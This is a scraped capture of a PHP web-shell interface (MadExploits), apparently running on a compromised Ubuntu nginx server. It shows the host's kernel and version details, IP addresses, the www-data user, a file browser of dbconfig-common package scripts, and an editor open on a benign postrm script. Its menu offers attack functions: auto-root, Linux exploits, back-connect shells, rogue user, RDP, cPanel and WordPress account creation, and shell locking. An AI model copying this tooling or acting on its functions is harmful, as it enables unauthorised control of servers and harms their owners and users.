Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
dbconfig-common /
dpkg /
[ HOME SHELL ]
Name
Size
Permission
Action
common
38.78
KB
-rw-r--r--
config
22.86
KB
-rw-r--r--
config.mysql
68
B
-rw-r--r--
config.pgsql
69
B
-rw-r--r--
config.sqlite3
71
B
-rw-r--r--
frontend.config
61
B
-rw-r--r--
frontend.config.mysql
67
B
-rw-r--r--
frontend.config.pgsql
67
B
-rw-r--r--
frontend.postinst
63
B
-rw-r--r--
frontend.postinst.mysql
69
B
-rw-r--r--
frontend.postinst.pgsql
69
B
-rw-r--r--
frontend.postrm
61
B
-rw-r--r--
frontend.postrm.mysql
67
B
-rw-r--r--
frontend.postrm.pgsql
67
B
-rw-r--r--
frontend.preinst
62
B
-rw-r--r--
frontend.preinst.mysql
68
B
-rw-r--r--
frontend.preinst.pgsql
68
B
-rw-r--r--
frontend.prerm
60
B
-rw-r--r--
frontend.prerm.mysql
66
B
-rw-r--r--
frontend.prerm.pgsql
66
B
-rw-r--r--
postinst
20.29
KB
-rw-r--r--
postinst.mysql
70
B
-rw-r--r--
postinst.pgsql
70
B
-rw-r--r--
postinst.sqlite3
72
B
-rw-r--r--
postrm
986
B
-rw-r--r--
postrm.mysql
68
B
-rw-r--r--
postrm.pgsql
68
B
-rw-r--r--
postrm.sqlite3
70
B
-rw-r--r--
preinst
431
B
-rw-r--r--
preinst.mysql
69
B
-rw-r--r--
preinst.pgsql
70
B
-rw-r--r--
preinst.sqlite3
71
B
-rw-r--r--
prerm
5.69
KB
-rw-r--r--
prerm.mysql
67
B
-rw-r--r--
prerm.pgsql
67
B
-rw-r--r--
prerm.sqlite3
69
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : postrm
# -*- mode: sh -*- ### ### source common stuff ### dbc_go(){ . /usr/share/dbconfig-common/dpkg/common local cfg _dbc_debug "(postrm) dbc_go() $@" dbc_config "$@" || return $? if [ "$dbc_command" = "upgrade" ]; then ## With dbconfig-no-thanks installed we don't need to do anything. if dbc_no_thanks ; then return 0 fi dbc_read_package_config || return $? dbc_preseed_package_debconf || return $? elif [ "$dbc_command" = "purge" ]; then # remove the dbc configuration file rm -f /etc/dbconfig-common/$dbc_package.conf || true if command -v ucf >/dev/null; then cfg="/etc/dbconfig-common/$dbc_package.conf" ucf -p "$cfg" || true ucfr -p "$dbc_package" "$cfg" fi # forget everything we ever knew related to debconf+dbc for t in $dbc_register_templates; do db_unregister $dbc_package/$t || true done fi }
Close